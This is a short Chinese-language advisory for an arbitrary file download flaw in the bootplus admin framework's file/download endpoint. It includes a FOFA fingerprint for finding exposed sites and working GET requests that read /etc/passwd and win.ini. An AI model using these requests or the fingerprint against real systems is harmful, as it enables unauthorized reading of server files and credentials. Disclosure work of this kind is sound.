bootplus管理系统 file/download 任意文件下载漏洞
漏洞描述
bootplus是基于SpringBoot + Shiro + MyBatisPlus的,拥有接口管理,权限管理,监控组件等功能的一体化权限管理框架。该项目中的file/download接口存在任意文件下载漏洞, 攻击者可以通过该漏洞下载查看目标系统的任意文件。
威胁等级: 高危
漏洞分类: 任意文件读取
涉及厂商及产品:bootplus
是否开源:是
应用指纹及检出思路
匹配源代码/statics/css/admin/AdminLTE.min.css 即可
fofa : body="/statics/css/admin/AdminLTE.min.css"
漏洞复现
GET /file/download?name=C://windows/win.ini&real=1 HTTP/1.1
Host: 127.0.0.1:8090
GET /file/download?name=/etc/passwd&real=1